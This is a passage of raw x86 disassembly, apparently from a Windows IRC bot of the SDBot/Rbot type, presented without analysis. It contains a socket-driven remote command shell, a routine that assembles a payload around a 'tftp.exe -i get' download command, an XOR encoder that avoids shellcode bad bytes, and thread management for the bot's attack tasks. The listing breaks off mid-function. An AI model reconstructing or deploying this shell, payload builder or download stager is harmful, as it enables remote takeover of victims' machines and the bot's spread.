var_C8 = byte ptr -0C8h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B0h
push ebx
push esi
mov ebx, ds:off_424074
push edi
mov edi, [ebp+arg_0]
lea eax, [ebp+arg_0]
push 0
push eax
lea eax, [ebp+var_C8]
push 0C8h
push eax
push dword ptr [edi]
loc_416910: ; CODE XREF: sub_4168E7+8F�j
call ebx ; sub_49C3FC
test eax, eax
jz short loc_416978
xor eax, eax
xor dl, dl
xor esi, esi
cmp [ebp+arg_0], eax
jbe short loc_41694B
loc_416921: ; CODE XREF: sub_4168E7+62�j
mov cl, [ebp+esi+var_C8]
cmp cl, 0Ah
jnz short loc_41693B
cmp dl, 0Dh
jz short loc_41693B
mov [ebp+eax+var_1B0], 0Dh
inc eax
loc_41693B: ; CODE XREF: sub_4168E7+44�j
; sub_4168E7+49�j
mov [ebp+eax+var_1B0], cl
inc eax
inc esi
mov dl, cl
cmp esi, [ebp+arg_0]
jb short loc_416921
loc_41694B: ; CODE XREF: sub_4168E7+38�j
push 0
push eax
lea eax, [ebp+var_1B0]
push eax
push dword ptr [edi+0Ch]
call ds:dword_43F6B8 ; send
test eax, eax
jle short loc_416978
lea eax, [ebp+arg_0]
push 0
push eax
lea eax, [ebp+var_C8]
push 0C8h
push eax
push dword ptr [edi]
jmp short loc_416910
; ---------------------------------------------------------------------------
loc_416978: ; CODE XREF: sub_4168E7+2D�j
; sub_4168E7+79�j
mov esi, ds:dword_42408C
call esi ; RtlGetLastWin32Error
cmp eax, 6Dh
jz short loc_416994
call esi ; RtlGetLastWin32Error
push eax
push offset dword_4393C0
call sub_40BFE1
pop ecx
pop ecx
loc_416994: ; CODE XREF: sub_4168E7+9C�j
pop edi
pop esi
pop ebx
leave
retn
sub_4168E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416999 proc near ; DATA XREF: sub_4165C4+71�o
var_DC = byte ptr -0DCh
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0DCh
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_0]
xor esi, esi
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
loc_4169B2: ; CODE XREF: sub_416999+39�j
; sub_416999+D7�j ...
push ebx
lea eax, [ebp+arg_0+3]
push 1
push eax
push dword ptr [edi+0Ch]
call ds:dword_43F680 ; recv
test eax, eax
jle loc_416AB7
cmp [ebp+var_10], ebx
jbe short loc_4169D4
dec [ebp+var_10]
jmp short loc_4169B2
; ---------------------------------------------------------------------------
loc_4169D4: ; CODE XREF: sub_416999+34�j
mov al, byte ptr [ebp+arg_0+3]
movsx ecx, al
cmp ecx, 0FFh
jz loc_416A97
cmp al, 8
mov [ebp+var_C], ebx
jz short loc_416A44
cmp al, 7Fh
jz short loc_416A44
cmp al, 3
jnz short loc_4169FF
push ebx
push ebx
call ds:dword_424184 ; GenerateConsoleCtrlEvent
jmp short loc_416A6B
; ---------------------------------------------------------------------------
loc_4169FF: ; CODE XREF: sub_416999+5A�j
cmp al, 15h
jnz short loc_416A21
xor esi, esi
mov [ebp+var_8], 20h
mov [ebp+var_7], 58h
mov [ebp+var_6], 58h
mov [ebp+var_5], 58h
mov [ebp+var_4], 0Dh
mov [ebp+var_3], 0Ah
push 6
jmp short loc_416A57
; ---------------------------------------------------------------------------
loc_416A21: ; CODE XREF: sub_416999+68�j
mov [ebp+esi+var_DC], al
inc esi
push 1
cmp al, 0Dh
mov [ebp+var_8], al
pop ecx
jnz short loc_416A58
mov [ebp+esi+var_DC], 0Ah
mov [ebp+var_7], 0Ah
inc esi
push 2
jmp short loc_416A57
; ---------------------------------------------------------------------------
loc_416A44: ; CODE XREF: sub_416999+52�j
; sub_416999+56�j
cmp esi, ebx
jbe short loc_416A6E
dec esi
mov [ebp+var_8], 8
mov [ebp+var_7], 20h
mov [ebp+var_6], 8
push 3
loc_416A57: ; CODE XREF: sub_416999+86�j
; sub_416999+A9�j
pop ecx
loc_416A58: ; CODE XREF: sub_416999+98�j
push ebx
lea eax, [ebp+var_8]
push ecx
push eax
push dword ptr [edi+0Ch]
call ds:dword_43F6B8 ; send
test eax, eax
jle short loc_416AB7
loc_416A6B: ; CODE XREF: sub_416999+64�j
mov al, byte ptr [ebp+arg_0+3]
loc_416A6E: ; CODE XREF: sub_416999+AD�j
cmp al, 0Dh
jnz loc_4169B2
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_DC]
push esi
push eax
push dword ptr [edi+4]
call ds:dword_42407C ; WriteFile
test eax, eax
jz short loc_416AB7
xor esi, esi
jmp loc_4169B2
; ---------------------------------------------------------------------------
loc_416A97: ; CODE XREF: sub_416999+47�j
cmp [ebp+var_C], ebx
jnz short loc_416AA8
mov [ebp+var_C], 1
jmp loc_4169B2
; ---------------------------------------------------------------------------
loc_416AA8: ; CODE XREF: sub_416999+101�j
mov [ebp+var_10], 0Ah
mov [ebp+var_C], ebx
jmp loc_4169B2
; ---------------------------------------------------------------------------
loc_416AB7: ; CODE XREF: sub_416999+2B�j
; sub_416999+D0�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_416999 endp
; =============== S U B R O U T I N E =======================================
sub_416ABC proc near ; CODE XREF: sub_416ADC+A�p
; sub_416BB4+8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_417AB0
push [esp+8+arg_4]
mov esi, eax
call sub_417AB0
pop ecx
lea eax, [esi+eax*2+0C1h]
pop ecx
pop esi
retn
sub_416ABC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416ADC proc near ; CODE XREF: sub_416BCB+49�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_C]
push [ebp+arg_8]
call sub_416ABC
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
mov [ebp+var_4], eax
jbe short loc_416AF9
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_416AF9: ; CODE XREF: sub_416ADC+17�j
push ebx
push esi
push edi
push [ebp+arg_8]
call sub_417AB0
push [ebp+arg_C]
mov esi, eax
call sub_417AB0
mov edi, eax
mov ebx, [ebp+arg_0]
push 0FFFFFFEDh
lea eax, [edi+esi+12h]
mov ds:dword_4394A0, eax
lea eax, [edi+1]
mov ds:dword_4394C1, eax
lea eax, [edi+17h]
mov ds:dword_4394B9, eax
pop eax
push 74h
sub eax, edi
push offset dword_43943C
push ebx
mov ds:dword_4394CF, eax
call sub_417390
push esi
lea eax, [ebx+74h]
push [ebp+arg_8]
push eax
call sub_417390
add esi, 74h
push 5
push (offset aTftp_exeIGet+0Ch)
lea eax, [esi+ebx]
push eax
call sub_417390
add esi, 5
push edi
push [ebp+arg_C]
lea eax, [esi+ebx]
push eax
call sub_417390
add esi, edi
push 10h
push (offset aTftp_exeIGet+11h)
lea eax, [esi+ebx]
push eax
call sub_417390
add esp, 44h
add esi, 10h
push edi
lea eax, [esi+ebx]
push [ebp+arg_C]
push eax
call sub_417390
add esi, edi
push 38h
add esi, ebx
push offset byte_4394C5
push esi
call sub_417390
mov eax, [ebp+var_4]
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_416ADC endp
; =============== S U B R O U T I N E =======================================
sub_416BB4 proc near ; CODE XREF: sub_416BCB+D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_416ABC
push eax
call sub_416C38
add esp, 0Ch
retn
sub_416BB4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416BCB proc near ; CODE XREF: sub_402B84+32�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_8]
push edi
mov edi, [ebp+arg_C]
push edi
push ebx
call sub_416BB4
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
ja short loc_416BEB
cmp eax, 0FFFFh
jbe short loc_416BEF
loc_416BEB: ; CODE XREF: sub_416BCB+17�j
xor eax, eax
jmp short loc_416C34
; ---------------------------------------------------------------------------
loc_416BEF: ; CODE XREF: sub_416BCB+1E�j
push esi
push edi
push ebx
call sub_416ABC
add eax, 101h
push eax
call sub_417B89
add esp, 0Ch
mov esi, eax
push edi
push ebx
push edi
push ebx
call sub_416ABC
pop ecx
pop ecx
push eax
push esi
call sub_416ADC
push eax
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416C53
push esi
mov edi, eax
call sub_417C3B
add esp, 24h
mov eax, edi
pop esi
loc_416C34: ; CODE XREF: sub_416BCB+22�j
pop edi
pop ebx
pop ebp
retn
sub_416BCB endp
; =============== S U B R O U T I N E =======================================
sub_416C38 proc near ; CODE XREF: sub_416BB4+E�p
; sub_416C53+4A�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test cl, cl
jnz short loc_416C41
inc ecx
loc_416C41: ; CODE XREF: sub_416C38+6�j
mov eax, 0FFh
cmp eax, ecx
sbb eax, eax
and eax, 2
add eax, 15h
add eax, ecx
retn
sub_416C38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416C53 proc near ; CODE XREF: sub_416BCB+56�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_C], 0Ah
jz short loc_416C6F
cmp byte ptr [ebp+arg_C], 0Dh
jz short loc_416C6F
cmp byte ptr [ebp+arg_C], 5Ch
jz short loc_416C6F
cmp byte ptr [ebp+arg_C], 0
jnz short loc_416C72
loc_416C6F: ; CODE XREF: sub_416C53+8�j
; sub_416C53+E�j ...
inc [ebp+arg_C]
loc_416C72: ; CODE XREF: sub_416C53+1A�j
push esi
mov esi, 0FFh
cmp [ebp+arg_C], esi
jbe short loc_416C9A
mov eax, [ebp+arg_C]
shr eax, 8
cmp al, 0Ah
jz short loc_416C93
cmp al, 0Dh
jz short loc_416C93
cmp al, 5Ch
jz short loc_416C93
test al, al
jnz short loc_416C9A
loc_416C93: ; CODE XREF: sub_416C53+32�j
; sub_416C53+36�j ...
add [ebp+arg_C], 100h
loc_416C9A: ; CODE XREF: sub_416C53+28�j
; sub_416C53+3E�j
push [ebp+arg_C]
call sub_416C38
cmp eax, [ebp+arg_4]
pop ecx
mov [ebp+var_4], eax
ja short loc_416CB2
cmp eax, 0FFFFh
jbe short loc_416CB9
loc_416CB2: ; CODE XREF: sub_416C53+56�j
xor eax, eax
jmp loc_416D57
; ---------------------------------------------------------------------------
loc_416CB9: ; CODE XREF: sub_416C53+5D�j
mov ecx, [ebp+arg_C]
push ebx
mov bl, ds:byte_489FE8
xor edx, edx
push edi
mov edi, [ebp+arg_8]
test ecx, ecx
jbe short loc_416CE9
loc_416CCD: ; CODE XREF: sub_416C53+94�j
mov al, [edx+edi]
xor al, bl
jz short loc_416CE0
cmp al, 0Ah
jz short loc_416CE0
cmp al, 0Dh
jz short loc_416CE0
cmp al, 5Ch
jnz short loc_416CE4
loc_416CE0: ; CODE XREF: sub_416C53+7F�j
; sub_416C53+83�j ...
inc bl
xor edx, edx
loc_416CE4: ; CODE XREF: sub_416C53+8B�j
inc edx
cmp edx, ecx
jb short loc_416CCD
loc_416CE9: ; CODE XREF: sub_416C53+78�j
cmp ecx, esi
mov ds:byte_489FE8, bl
ja short loc_416D15
push 15h
push offset loc_439424
push [ebp+arg_0]
mov ds:byte_439431, cl
mov ds:byte_439435, bl
call sub_417390
add esp, 0Ch
push 15h
jmp short loc_416D36
; ---------------------------------------------------------------------------
loc_416D15: ; CODE XREF: sub_416C53+9E�j
push 17h
push offset loc_43940C
push [ebp+arg_0]
mov ds:word_43941A, cx
mov ds:byte_43941F, bl
call sub_417390
add esp, 0Ch
push 17h
loc_416D36: ; CODE XREF: sub_416C53+C0�j
xor eax, eax
pop ecx
cmp [ebp+arg_C], eax
jbe short loc_416D52
mov edx, [ebp+arg_0]
lea esi, [ecx+edx]
loc_416D44: ; CODE XREF: sub_416C53+FD�j
mov cl, [eax+edi]
xor cl, bl
mov [esi+eax], cl
inc eax
cmp eax, [ebp+arg_C]
jb short loc_416D44
loc_416D52: ; CODE XREF: sub_416C53+E9�j
mov eax, [ebp+var_4]
pop edi
pop ebx
loc_416D57: ; CODE XREF: sub_416C53+61�j
pop esi
leave
retn
sub_416C53 endp
; =============== S U B R O U T I N E =======================================
sub_416D5A proc near ; CODE XREF: sub_4060D0+227�p
; sub_407252+F0�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, offset dword_444EC0
loc_416D62: ; CODE XREF: sub_416D5A+18�j
cmp byte ptr [eax], 0
jz short loc_416D76
add eax, 234h
inc edi
cmp eax, offset dword_489C50
jl short loc_416D62
jmp short loc_416DC1
; ---------------------------------------------------------------------------
loc_416D76: ; CODE XREF: sub_416D5A+B�j
push esi
mov esi, edi
imul esi, 234h
push 1FFh
push [esp+0Ch+arg_0]
lea eax, dword_444EC0[esi]
push eax
call sub_418C10
mov eax, [esp+14h+arg_4]
add esp, 0Ch
mov ds:dword_4450C0[esi], eax
and ds:dword_4450C4[esi], 0
mov eax, [esp+8+arg_8]
and ds:dword_4450C8[esi], 0
mov ds:dword_4450CC[esi], eax
and ds:byte_4450D8[esi], 0
pop esi
loc_416DC1: ; CODE XREF: sub_416D5A+1A�j
mov eax, edi
pop edi
retn
sub_416D5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416DC5 proc near ; DATA XREF: sub_40EE72+5BFF�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
rep movsd
push [ebp+var_10]
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_94]
push [ebp+var_C]
push eax
push [ebp+var_98]
call sub_416E17
push [ebp+var_14]
call sub_417076
add esp, 14h
push 0
call ds:dword_424054 ; ExitThread
pop edi
pop esi
sub_416DC5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416E17 proc near ; CODE XREF: sub_416DC5+38�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset aThreadList ; "-[Thread List]-"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
xor edi, edi
mov esi, offset dword_444EC0
loc_416E41: ; CODE XREF: sub_416E17+78�j
cmp byte ptr [esi], 0
jz short loc_416E82
cmp [ebp+arg_C], 0
jnz short loc_416E55
cmp dword ptr [esi+204h], 0
jnz short loc_416E82
loc_416E55: ; CODE XREF: sub_416E17+33�j
push esi
push edi
lea eax, [ebp+var_200]
push offset aD_S ; "%d. %s"
push eax
call sub_4172AE
push 1
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 24h
loc_416E82: ; CODE XREF: sub_416E17+2D�j
; sub_416E17+3C�j
add esi, 234h
inc edi
cmp esi, offset dword_489C50
jl short loc_416E41
pop edi
pop esi
leave
retn
sub_416E17 endp
; =============== S U B R O U T I N E =======================================
sub_416E95 proc near ; CODE XREF: sub_40EE72+4DD7�p
; sub_416F23+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_416F1D
cmp esi, 1F4h
jge short loc_416F1D
imul esi, 234h
push edi
push ebx
push ds:dword_4450D4[esi]
lea edi, dword_4450D4[esi]
call ds:dword_424168 ; TerminateThread
cmp [edi], ebx
jz short loc_416ECD
push 1
pop ebp
loc_416ECD: ; CODE XREF: sub_416E95+33�j
mov [edi], ebx
lea edi, dword_4450C8[esi]
mov ds:dword_4450C0[esi], ebx
mov ds:dword_4450C4[esi], ebx
mov eax, [edi]
cmp eax, ebx
jbe short loc_416EEE
push eax
call sub_415417
pop ecx
loc_416EEE: ; CODE XREF: sub_416E95+50�j
mov [edi], ebx
lea edi, dword_4450CC[esi]
mov byte ptr ds:dword_444EC0[esi], bl
mov ds:byte_4450D8[esi], bl
push dword ptr [edi]
call ds:dword_43F700 ; closesocket
lea esi, dword_4450D0[esi]
mov [edi], ebx
push dword ptr [esi]
call ds:dword_43F700 ; closesocket
mov [esi], ebx
pop edi
loc_416F1D: ; CODE XREF: sub_416E95+D�j
; sub_416E95+15�j
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_416E95 endp
; =============== S U B R O U T I N E =======================================
sub_416F23 proc near ; CODE XREF: sub_40AC42:loc_40AC66�p
; sub_40D3A5+18�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_444EC0
loc_416F2F: ; CODE XREF: sub_416F23+2A�j
cmp byte ptr [esi], 0
jz short loc_416F40
push edi
call sub_416E95
test eax, eax
pop ecx
jz short loc_416F40
inc ebx
loc_416F40: ; CODE XREF: sub_416F23+F�j
; sub_416F23+1A�j
add esi, 234h
inc edi
cmp esi, offset dword_489C50
jl short loc_416F2F
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_416F23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416F55 proc near ; CODE XREF: sub_40EE72+1E3D�p
; sub_40EE72+1EAB�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_4450C4
loc_416F69: ; CODE XREF: sub_416F55+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_416F8B
test edi, edi
jle short loc_416F7D
cmp [esi], edi
jz short loc_416F7D
cmp ebx, edi
jnz short loc_416F8B
loc_416F7D: ; CODE XREF: sub_416F55+1E�j
; sub_416F55+22�j
push ebx
call sub_416E95
test eax, eax
pop ecx
jz short loc_416F8B
inc [ebp+var_4]
loc_416F8B: ; CODE XREF: sub_416F55+1A�j
; sub_416F55+26�j ...
add esi, 234h
inc ebx
cmp esi, offset dword_489E54
jl short loc_416F69
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_416F55 endp
; =============== S U B R O U T I N E =======================================
sub_416FA2 proc near ; CODE XREF: sub_4071DB+B�p
; sub_407252+2D�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_4450C0
loc_416FA9: ; CODE XREF: sub_416FA2+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_416FB2
inc eax
loc_416FB2: ; CODE XREF: sub_416FA2+D�j
add ecx, 234h
cmp ecx, offset dword_489E50
jl short loc_416FA9
retn
sub_416FA2 endp
; =============== S U B R O U T I N E =======================================
sub_416FC1 proc near ; CODE XREF: sub_40EE72+5696�p
arg_0 = dword ptr 4
xor eax, eax
push esi
xor edx, edx
mov ecx, offset dword_4450C0
loc_416FCB: ; CODE XREF: sub_416FC1+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_416FE4
add ecx, 234h
inc edx
cmp ecx, offset dword_489E50
jl short loc_416FCB
pop esi
retn
; ---------------------------------------------------------------------------
loc_416FE4: ; CODE XREF: sub_416FC1+10�j
mov eax, edx
pop esi
retn
sub_416FC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416FE8 proc near ; CODE XREF: sub_40EE72+1070�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 200h
xor eax, eax
cmp [ebp+arg_1C], eax
jz short loc_417001
push [ebp+arg_1C]
call sub_41781F
pop ecx
loc_417001: ; CODE XREF: sub_416FE8+E�j
push eax
push [ebp+arg_18]
call sub_416F55
pop ecx
test eax, eax
pop ecx
jle short loc_41702D
push eax
lea eax, [ebp+var_200]
push [ebp+arg_14]
push [ebp+arg_10]
push offset aSSStopped_DThr ; "%s: %s stopped. (%d thread(s) stopped.)"...
push eax
call sub_4172AE
add esp, 14h
jmp short loc_417047
; ---------------------------------------------------------------------------
loc_41702D: ; CODE XREF: sub_416FE8+26�j
push [ebp+arg_14]
lea eax, [ebp+var_200]
push [ebp+arg_10]
push offset aSNoSThreadFoun ; "%s: No %s thread found."
push eax
call sub_4172AE
add esp, 10h
loc_417047: ; CODE XREF: sub_416FE8+43�j
cmp [ebp+arg_C], 0
jnz short loc_417067
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_417067: ; CODE XREF: sub_416FE8+63�j
lea eax, [ebp+var_200]
push eax
call sub_40BF6D
pop ecx
leave
retn
sub_416FE8 endp
; =============== S U B R O U T I N E =======================================
sub_417076 proc near ; CODE XREF: sub_401000+A5�p
; sub_40144A+8D�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
imul eax, 234h
mov ds:dword_4450D4[eax], ecx
mov ds:dword_4450C0[eax], ecx
mov ds:dword_4450C4[eax], ecx
mov ds:dword_4450C8[eax], ecx
mov ds:dword_4450CC[eax], ecx
mov ds:dword_4450D0[eax], ecx
mov byte ptr ds:dword_444EC0[eax], cl
mov ds:byte_4450D8[eax], cl
retn
sub_417076 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4170B3 proc near ; CODE XREF: sub_40EE72+6187�p
; sub_4171E1+6B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push 1
pop eax
loc_4170BD: ; CODE XREF: sub_4170B3+68�j
mov cl, [esi]
test cl, cl
jz short loc_41711D
cmp eax, 1
jnz short loc_41711D
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_41711D
cmp cl, 2Ah
jz short loc_417104
cmp cl, 3Fh
jz short loc_4170E7
cmp cl, 5Bh
jz short loc_4170EC
xor eax, eax
cmp cl, dl
setz al
loc_4170E7: ; CODE XREF: sub_4170B3+26�j
inc [ebp+arg_4]
jmp short loc_417117
; ---------------------------------------------------------------------------
loc_4170EC: ; CODE XREF: sub_4170B3+2B�j
lea eax, [ebp+arg_4]
inc esi
push eax
lea eax, [ebp+arg_0]
push eax
mov [ebp+arg_0], esi
call sub_417149
mov esi, [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_417117
; ---------------------------------------------------------------------------
loc_417104: ; CODE XREF: sub_4170B3+21�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_4171E1
mov esi, [ebp+arg_0]
pop ecx
pop ecx
dec esi
loc_417117: ; CODE XREF: sub_4170B3+37�j
; sub_4170B3+4F�j
inc esi
mov [ebp+arg_0], esi
jmp short loc_4170BD
; ---------------------------------------------------------------------------
loc_41711D: ; CODE XREF: sub_4170B3+E�j
; sub_4170B3+13�j ...
cmp byte ptr [esi], 2Ah
jnz short loc_41712D
cmp eax, 1
jnz short loc_417144
inc esi
mov [ebp+arg_0], esi
jmp short loc_41711D
; ---------------------------------------------------------------------------
loc_41712D: ; CODE XREF: sub_4170B3+6D�j
cmp eax, 1
jnz short loc_417144
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_417144
cmp byte ptr [esi], 0
jnz short loc_417144
push 1
pop eax
jmp short loc_417146
; ---------------------------------------------------------------------------
loc_417144: ; CODE XREF: sub_4170B3+72�j
; sub_4170B3+7D�j ...
xor eax, eax
loc_417146: ; CODE XREF: sub_4170B3+8F�j
pop esi
pop ebp
retn
sub_4170B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417149 proc near ; CODE XREF: sub_4170B3+45�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
push edi
xor edi, edi
push 1
mov ecx, [edx]
and [ebp+var_8], edi
pop eax
cmp byte ptr [ecx], 21h
mov [ebp+var_4], eax
jnz short loc_41716A
inc ecx
mov [ebp+var_8], eax
mov [edx], ecx
loc_41716A: ; CODE XREF: sub_417149+19�j
push ebx
push esi
loc_41716C: ; CODE XREF: sub_417149+7B�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_41717A
cmp [ebp+var_4], eax
jnz short loc_4171C6
loc_41717A: ; CODE XREF: sub_417149+2A�j
test edi, edi
jnz short loc_4171BB
cmp bl, 2Dh
jnz short loc_4171AF
mov al, [ecx+1]
lea esi, [ecx+1]
mov cl, [ecx-1]
cmp cl, al
jge short loc_4171AF
cmp al, 5Dh
jz short loc_4171AF
cmp [ebp+var_4], edi
jnz short loc_4171AF
mov ebx, [ebp+arg_4]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_4171BB
cmp bl, al
jg short loc_4171BB
push 1
mov [edx], esi
pop edi
jmp short loc_4171BB
; ---------------------------------------------------------------------------
loc_4171AF: ; CODE XREF: sub_417149+38�j
; sub_417149+45�j ...
mov eax, [ebp+arg_4]
mov eax, [eax]
cmp bl, [eax]
jnz short loc_4171BB
push 1
pop edi
loc_4171BB: ; CODE XREF: sub_417149+33�j
; sub_417149+59�j ...
inc dword ptr [edx]
and [ebp+var_4], 0
push 1
pop eax
jmp short loc_41716C
; ---------------------------------------------------------------------------
loc_4171C6: ; CODE XREF: sub_417149+2F�j
cmp [ebp+var_8], eax
pop esi
pop ebx
jnz short loc_4171D3
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_4171D3: ; CODE XREF: sub_417149+82�j
cmp edi, eax
jnz short loc_4171DC
mov eax, [ebp+arg_4]
inc dword ptr [eax]
loc_4171DC: ; CODE XREF: sub_417149+8C�j
mov eax, edi
pop edi
leave
retn
sub_417149 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4171E1 proc near ; CODE XREF: sub_4170B3+59�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
xor ebx, ebx
loc_4171FD: ; CODE XREF: sub_4171E1+3A�j
cmp [eax], bl
jz short loc_41721D
mov cl, [ecx]
cmp cl, 3Fh
jz short loc_417212
cmp cl, 2Ah
jnz short loc_41721D
cmp cl, 3Fh
jnz short loc_417215
loc_417212: ; CODE XREF: sub_4171E1+25�j
inc eax
mov [edi], eax
loc_417215: ; CODE XREF: sub_4171E1+2F�j
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
jmp short loc_4171FD
; ---------------------------------------------------------------------------
loc_41721D: ; CODE XREF: sub_4171E1+1E�j
; sub_4171E1+2A�j ...
mov eax, [esi]
cmp byte ptr [eax], 2Ah
jnz short loc_417228
inc dword ptr [esi]
jmp short loc_41721D
; ---------------------------------------------------------------------------
loc_417228: ; CODE XREF: sub_4171E1+41�j
mov eax, [edi]
mov cl, [eax]
cmp cl, bl
jnz short loc_417249
mov edx, [esi]
cmp [edx], bl
jz short loc_41723A
xor eax, eax
jmp short loc_4172A9
; ---------------------------------------------------------------------------
loc_41723A: ; CODE XREF: sub_4171E1+53�j
cmp cl, bl
jnz short loc_417249
mov ecx, [esi]
cmp [ecx], bl
jnz short loc_417249
push 1
pop eax
jmp short loc_4172A9
; ---------------------------------------------------------------------------
loc_417249: ; CODE XREF: sub_4171E1+4D�j
; sub_4171E1+5B�j ...
push eax
push dword ptr [esi]
call sub_4170B3
pop ecx
test eax, eax
pop ecx
jnz short loc_417293
loc_417257: ; CODE XREF: sub_4171E1+B0�j
inc dword ptr [edi]
mov eax, [edi]
loc_41725B: ; CODE XREF: sub_4171E1+90�j
mov ecx, [esi]
mov dl, [eax]
mov cl, [ecx]
cmp cl, dl
jz short loc_417273
cmp cl, 5Bh
jz short loc_417273
cmp dl, bl
jz short loc_417273
inc eax
mov [edi], eax
jmp short loc_41725B
; ---------------------------------------------------------------------------
loc_417273: ; CODE XREF: sub_4171E1+82�j
; sub_4171E1+87�j ...
mov eax, [edi]
cmp [eax], bl
jz short loc_41728A
push eax
push dword ptr [esi]
call sub_4170B3
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_41728F
; ---------------------------------------------------------------------------
loc_41728A: ; CODE XREF: sub_4171E1+96�j
mov [ebp+var_4], ebx
xor eax, eax
